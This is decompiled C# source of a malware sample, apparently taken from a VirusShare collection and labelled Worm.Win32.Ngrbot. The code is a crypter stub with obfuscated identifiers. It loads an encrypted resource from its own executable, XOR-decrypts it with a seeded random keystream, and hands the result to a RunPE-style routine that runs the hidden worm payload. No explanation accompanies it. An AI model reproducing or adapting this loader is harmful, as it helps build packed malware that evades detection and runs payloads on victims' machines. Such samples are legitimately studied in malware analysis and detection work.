// Decompiled with JetBrains decompiler
// Type: ƀƚąƫcħ.Module1
// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ƀƚąƫcħ
{
  [StandardModule]
  internal sealed class Module1
  {
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);

    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);

    [DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);

    [STAThread]
    public static void main()
    {
      string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
      IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
      IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
      IntPtr source = Module1.LoadResource(moduleHandle, resource);
      int length = Module1.SizeofResource(moduleHandle, resource);
      byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
      Marshal.Copy(source, numArray, 0, length);
      int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
      byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
      Random random = new Random(int32_1);
      byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
      random.NextBytes(buffer);
      int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
      for (int index = 0; index <= int32_2; ++index)
        Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
      Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
    }
  }
}